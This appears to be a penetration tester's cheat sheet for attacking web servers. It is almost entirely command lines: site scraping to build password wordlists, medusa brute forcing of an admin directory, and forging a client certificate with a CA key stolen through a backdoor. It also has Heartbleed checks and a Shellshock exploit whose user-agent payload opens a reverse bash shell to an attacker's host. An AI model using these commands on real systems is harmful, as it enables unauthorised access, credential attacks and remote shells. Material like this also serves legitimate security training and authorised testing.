The Hypertext Transfer Protocol is an application protocol for distributed, collaborative, hypermedia information systems.
--
443/https
-> Check SSL certificate for hostnames and email addresses
General
Check headers
Follow redirection
Check links
curl <ip> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
Identify technologies used
Get response
Terminal/Text-based browsers
browsh --startup-url <url>
URL brute force
Scrape website
Scrapes a website to generate password list from words, found there
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
.htaccess
Brute force
medusa -h <ip> -u <user> -P <wordlist-file> -M http -m DIR:/admin -T 10
Sign SSL certificate
Got private key from vsftpd backdoor php shell (ca.key)
Export certificate from Firefox (ca.crt)
openssl pkey -in ca.key -pubout
openssl x509 -in ca.crt -pubkey -noout
openssl genrsa -out client.key 4096
openssl req -new -key client.key -out client.csr
openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
openssl verify -verbose -CAfile ca.crt client.cer
-> Firefox -> Preferences -> Search certificates -> Import "client.p12", Import "ca.crt" (trust)
Troubleshooting
No permission to file, but to folder? -> re-create file!
Heartbleed
Check
sslyze --heartbleed <ip>
nmap -sV --script=ssl-heartbleed -oA nmap_heartbleed <ip>
Exploits
Shellshock
Check
nmap -p80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi <ip>
Exploit
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1" http://<ip>/cgi-bin/admin.cgi
Apache2
Debian: /etc/apache2/
CentOS: /etc/httpd/
Interesting files:
./apache2.conf
./ports.conf
./envvars
./access.log
./error.log
/etc/logrotate.d/apache2
Find document root:
grep -Ri DocumentRoot .
grep -R '$bigtree\["config"\]\["db"\]' .
